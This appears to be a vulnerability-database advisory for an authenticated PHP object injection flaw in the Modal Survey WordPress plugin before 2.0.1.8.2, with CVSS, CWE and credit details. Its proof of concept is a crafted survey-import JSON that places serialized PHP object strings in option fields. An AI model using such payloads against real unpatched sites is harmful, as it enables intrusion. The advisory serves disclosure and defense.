WordPress Plugin Vulnerabilities

Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection

Description

The Unserialize() function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability

Proof of Concept

{
   "name":"Open Text Answer Sample",
   "id":"924478511",
   "options":"[]",
   "global":"0",
   "start_time":"0000-00-00 00:00:00",
   "expiry_time":"0000-00-00 00:00:00",
   "export_time":"2020-12-21 01:08",
   "questions":{
      "1":{
         "name":"How fast is our support? [-]",
         "count":0,
         "qoptions":"O:21:\"Object_Injection_func\":0:{}",
         "1":{
            "answer":"Very slow [Speed]",
            "count":"0",
            "aoptions":"O:21:\"Object_Injection_func\":0:{}",
            "percentage":"0",
            "uniqueid":"2646920000000"
         }
      }
   }
}

Affects Plugins

Plugin icon
modal_survey
Fixed in 2.0.1.8.2

References

URL
http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type
OBJECT INJECTION
OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502
CVSS
7.9 (high)

Miscellaneous

Original Researcher
Pagely
Submitter
John Castro
Submitter website
https://pagely.com/
Submitter twitter
pagely
Verified
Yes
WPVDB ID
05dbd5a0-af45-40fa-a027-fc8f9dd9a706

Timeline

Publicly Published
2021-01-08 (about 3 years ago)
Added
2021-01-08 (about 3 years ago)
Last Updated
2021-01-10 (about 3 years ago)

Other

Published
Title
Published
2016-11-17
Title
Post Indexer <= 3.0.6.1 - PHP Object Injection via MitM
Published
2023-12-29
Title
Theme per user < 1.0.2 - Unauthenticated PHP Object Injection
Published
2022-12-16
Title
Starter Templates by Kadence WP < 1.2.17 - Admin+ PHP Object Injection
Published
2015-09-25
Title
WP Super Cache < 1.4.5 - PHP Object Injection
Published
2018-10-11
Title
WooCommerce <= 3.4.5 - Authenticated Object Injection